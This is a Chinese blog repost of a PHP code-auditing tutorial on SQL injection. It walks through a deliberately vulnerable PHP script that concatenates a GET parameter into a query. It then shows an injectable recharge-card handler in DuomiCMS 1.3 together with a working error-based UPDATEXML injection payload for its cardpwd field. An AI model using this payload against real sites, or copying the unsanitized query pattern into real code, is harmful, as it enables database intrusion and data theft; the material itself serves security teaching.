php代码审计注入,PHP代码审计SQL注入篇

最新推荐文章于 2023-05-13 00:11:21 发布
最新推荐文章于 2023-05-13 00:11:21 发布
阅读量295 收藏
点赞数
文章标签: php代码审计注入

本帖最后由 MAX丶 于 2016-9-3 09:33 编辑

所谓SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。具体来说,它是利用现有应用程序,将(恶意)的SQL命令注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入(恶意)SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语句。[1]比如先前的很多影视网站泄露VIP会员密码大多就是通过WEB表单递交查询字符暴出的,这类表单特别容易受到攻击.】

通俗点讲就是没有严谨的过滤导致的】

下面我们来讲解一下今天的东西代码如下。【还有就是数据库文件在我上一篇xss储存那一篇文章发布过了我就不在复制过来了,下面是我们的注入文件。】

[PHP] 纯文本查看 复制代码<?php

mysql_connect('localhost','root','root');

mysql_select_db('test');

mysql_query("set names gbk");

echo $id=$_GET["id"];

echo "
";

//echo $sql="select * from book where id='$

$sql="select * from book where id=$id";

if ($row=mysql_query($sql))

{

$rows=mysql_fetch_array($row);

var_dump($rows);

}

?>

8f3ff2fbfdd7c7c8339951a6542705fa.gif

QQ截图20160903171725.png (187.31 KB, 下载次数: 178)

2016-9-3 17:17 上传

首先我们看一下代码;

[PHP] 纯文本查看 复制代码mysql_connect('localhost','root','root');

mysql_select_db('test');

mysql_query("set names gbk");

这是数据库配配置。

[PHP] 纯文本查看 复制代码echo $id=$_GET["id"];

大家可以看见这是直接输出这个GET的值。

[PHP] 纯文本查看 复制代码$sql="select * from book where id=$id";

然后这里直接进行SQL语句的

[PHP] 纯文本查看 复制代码($row=mysql_query($sql))

这里直接进行查询SQL语句

[PHP] 纯文本查看 复制代码$rows=mysql_fetch_array($row)

利用这一串代码直接取值

[PHP] 纯文本查看 复制代码var_dump($rows)

然后进行打印输出没有任何的过滤所以利用简单的SQL注入语句就可以直接查询相关需要的信息。】

8f3ff2fbfdd7c7c8339951a6542705fa.gif

QQ截图20160903171217.png (106.85 KB, 下载次数: 150)

2016-9-3 17:24 上传现在我给大家找个实例演示【并不是本人自己挖的】多米CMS最新版1.3版本注入.

漏洞文件member/mypay.php(14-40行)8f3ff2fbfdd7c7c8339951a6542705fa.gif

1.png (131.74 KB, 下载次数: 199)

2016-9-3 17:30 上传

[PHP] 纯文本查看 复制代码if(empty($_SESSION['duomi_user_id'])){

showMsg("请先登录","login.php");

exit();

}

elseif($dm=='mypay'){

$key=$_POST['cardkey'];

if($key==""){showMsg("请输入充值卡号","-1");exit;}

$pwd=$_POST['cardpwd'];

if($pwd==""){showMsg("请输入充值卡密码","-1");exit;}

$sqlt="SELECT * FROM duomi_card where ckey='$key'";

$sqlt="SELECT * FROM duomi_card where cpwd='$pwd'";

$row1 = $dsql->GetOne($sqlt);

if(!is_array($row1) OR $row1['status']<>0){

showMsg("充值卡信息有误","-1");exit;

}else{

$uname=$_SESSION['duomi_user_name'];

$points=$row1['climit'];

$dsql->executeNoneQuery("UPDATE duomi_card SET usetime=NOW(),uname='$uname',status='1' WHERE ckey='$key'");

$dsql->executeNoneQuery("UPDATE duomi_card SET usetime=NOW(),uname='$uname',status='1' WHERE cpwd='$pwd'");

$dsql->executeNoneQuery("UPDATE duomi_member SET points=points+$points WHERE username='$uname'");

showMsg("恭喜!充值成功!","mypay.php");exit;

}

}

else

{

大家可以清楚看见此处的”cardpwd”变量没有进行过滤就以POST提交方式传入了数据库造成注入。 构造POC如下(注意此处需要注册用户并且登陆详情请看该文件1-17行

http://localhost/member/mypay.php?dm=mypay

POST:cardpwd=-1' AND (UPDATEXML(1,CONCAT(0x7e,(USER()),0x7e),1)) and '1'='1

8f3ff2fbfdd7c7c8339951a6542705fa.gif

图片1.png (202.43 KB, 下载次数: 167)

2016-9-3 17:31 上传

没有幻觉
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
php代码审计之命令注入(3)
01-09
- 定期进行代码审计,检查可能存在的安全漏洞。 总之,理解这些函数的工作原理以及如何安全地使用它们对于编写安全的 PHP 应用至关重要。忽视命令注入的防范可能导致数据泄露、服务器被接管等严重后果。因此,开发...
PHP中查询sql语句
weixin_43786904的博客
01-09 3003
1:sql查询语句 描述:表示去数据库中指定的表内根据条件查询指定的内容。 语法:$sql = “select [信息] from [哪张表] where [查询条件]”; 说明: [信息]有两种写法: 一是 写* 星号,代表查询所有字段对应的信息 $sql = "select * from friendslist where 1 "; 二是写指定字段,代表查询某个字段对应信息,如果有多个用多好隔...
PHP代码注入PHP代码注入漏洞
cc
03-06 6104
call_user_func()等函数都有调用其他函数的功能,其中的一个参数作为要调用的函数名,那如果这个传入的函数名可控,那就可以调用意外的函数来执行我们想要的代码,也就是存在任意代码执行漏洞。以call_user_func($fun,$para)函数为例,该函数的第一个参数作为回调函数,后面的参数为回调函数的参数,将$para这个参数传递给$fun这个函数去执行。我们可以利用file_get_contents()函数,写入文件,该函数的作用在于将第二个参数作为内容写入到第一个参数的文件中。
PHP代码审计-sql注入
博客地址 www.sec0nd.top
10-24 1290
最近想学代码审计了,但是我本身的代码水平不高,学的比较基础,适合入门级别的朋友们阅读先学php审计,后面再学java的吧(java只懂一点点)就不太多的赘述漏洞和代码的基础了,遇到不会的搜索其他人的文章就可以学会的入门我是看的代码审计相关的一些知识后面实战的代码也在这里可以下载的。
PHP代码注入是什么意思?底层原理是什么?
长风破浪会有时的博客
05-13 341
当应用程序接收到用户提交的数据时,如果没有对数据进行充分的过滤和验证,攻击者就有可能通过构造恶意的输入,在应用程序中注入一些非法的代码PHP代码注入(Code Injection)指的是攻击者通过构造恶意的输入,在应用程序中注入一些非法的代码,从而在应用程序中执行攻击者的指令或代码。这种攻击方式通常会利用应用程序的漏洞,例如未对输入数据进行充分的过滤和验证,导致攻击者可以在应用程序中执行任意代码,造成严重的安全风险,如数据库被盗、系统崩溃等。
第二阶段:PHP代码审计SQL注入漏洞原理
qq_22132931的博客
11-16 193
第二阶段:PHP代码审计SQL注入漏洞原理
PHP代码审计文档.zip
11-02
第6课:PHP代码审计SQL注入漏洞mp4 第5课:审计涉及的超全局变量mp4 第4课:代码调试及 Xdebug的配置使用mp4 第3课:PHP核心配置详解mp4 第2课:代码审计的思路及流程mp4 第1课:环境配置及审计工具介绍mp4
【基础篇】第01篇:PHP代码审计笔记--SQL注入1
08-03
PHP代码审计笔记——SQL注入1】主要探讨的是在PHP环境中如何防止SQL注入攻击,特别是针对MySQL数据库。SQL注入是一种常见的网络安全威胁,攻击者通过构造恶意的SQL语句,利用程序漏洞来执行非授权的操作,如获取...
PHP代码审计音频文件.zip
11-02
任务6:PHP代码审计SQL注入漏洞mp4 任务5:审计涉及的超全局变量mp4 任务4:代码调试及 Xdebug的配置使用mp4 任务3:PHP核心配置详解mp4 任务2:代码审计的思路及流程mp4 任务1:环境配置及审计工具介绍mp4
PHP代码审计资料整理
03-04
PHP代码审计是软件开发过程中的一个重要环节,尤其是在后端开发领域。它涉及到对PHP代码进行深入检查,以发现潜在的安全漏洞、性能瓶颈和其他质量问题。本资料整理将围绕PHP代码审计这一主题,涵盖PHP开发语言的...
php查id号要不要加limit,php查询mysql中某id是否存在用哪个语句效率高?
weixin_34446948的博客
03-10 142
我想在mysql一个表中查询某个id是否存在?请问下面两种方法哪个效率更高?方法一:$sql="SELECT COUNT(*) FROM `table` WHERE id=10";$rst = mysql_query($sql);$row = mysql_fetch_row($rst);if($row[0]){//通过$row[0]是否为0来判断id=10是否存在}方法二:$sql="SELECT...
WEB漏洞之SQL注入
wj193165zl的博客
07-18 393
SQL注入的简单例子: 使用URL:http://localhost/a.php?id=1' 在程序中,会执行下面的语句: $id=$_GET['id']; $sql="SELECT * FROM user WHERE id=$id' LIMIT 0,1" 执行上面的这条语句就会报错,这里如果不对URL进行判断,那么这就会导致语句的执行错误,严重的,别人就可以获取到想要的数据信息。 如...
php代码审计-sql注入初级篇
MSB_WLAQ的博客
10-14 281
概述 代码审计顾名思义就是检查源代码中的缺点和错误信息,分析并找到这些问题引发的安全漏洞,并提供代码修订措施和建议。这篇文章的目的是为了让小伙伴们对php代码审计有一个基本的了解,采用的代码都是自己写的仅仅能体现出漏洞所以会略显简洁。并且这次文章的主要内容为代码审计所以不会写太多的注入语句,更多的是对代码的分析,有兴趣的同学可以百度查查资料。 环境要求 phpstudy和一篇简单易懂的php源码 sql注入 SQL 注入SQL Injection) 是发生在 Web 程序中数据库层的安全漏洞,是
ecshop_2.7.2_flow.php_sql注入漏洞利用工具
weixin_34125592的博客
09-25 413
漏洞利用前提:magic_quotes_gpc = off 下载地址1 更多工具在: http://www.isafe.cc/ flow. php页面的goods_number变量没有过滤导致字符型型注入,本漏洞利用前提是magic_quotes_gpc=off,关键代码如下: elseif ($_REQUEST['step'] == 'update_cart') { if (i...
PHP代码审计】 那些年我们一起挖掘SQL注入 - 4.全局防护Bypass之二次注入
05-28 291
PHP代码审计】 那些年我们一起挖掘SQL注入 - 4.全局防护Bypass之二次注入 0x01 背景 现在的WEB程序基本都有对SQL注入的全局过滤,像PHP开启了GPC或者在全局文件common.php上使用addslashes()函数对接收的参数进行过滤,尤其是单引号。二次注入也是一种比较常见的注入,它涉及到入库和出库。因为有全局转义所以...
sql注入php代码审计1
m0_55772907的博客
04-30 509
(1)注入原理 通过利用一些查询语句的漏洞,将sql语句传递到服务器解析并执行。它是一种注入攻击,可以执行恶意的sql语句。它通过将任意sql代码插入数据库查询,使攻击者能够完全控制web应用程序后面的数据库服务器。攻击者可以使用sql注入漏洞绕过应用程序的安全措施,可以绕过网页或web 应用程序的身份验证和授权,并检索整个sql数据库的内容,还可以使用sql注入来添加,修改和删除数据库中的记录。 (2)分类 1)联合查询 使用$_REQUEST直接接收id参数,且没有进行过滤,且可以接收coo
matlab下载.pdf
最新发布
07-14
matlab下载下载方式及注意事项
Android系统原理及开发要点详解-从入门到精通
07-13
Android系统原理及开发要点详解 Java4 Android视频教程 Android开发视频教学 从入门到精通 Android的软件管理器的开发教程视频 Android深入浅出_Android高端课程分享试听 JavaWeb Android系统的手机防盗软件的实现 Android开发入门与实战随书视频 视频列表.txt 0.0MB 开发入门与实战代码.rar 6.1MB 第9章 我来“广播”你的“意图”——Intent和Broadcast面对面.wmv 15.1MB 第8章 移动信息仓库——Android的数据存储操作之轻轻地我保护——SharedPreferences存储-2.wmv 0.6MB 第8章 移动信息仓库——Android的数据存储操作之轻轻地我保护——SharedPreferences存储-1.wmv 24.3MB 第8章 移动信息仓库——Android的数据存储操作之Android数据存储概述.wmv 57.7MB 第7章 良好的学习开端——Android基本组件介绍之友好地互动交流——对话框(Dialog)介绍与实例-2.wmv 7.

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值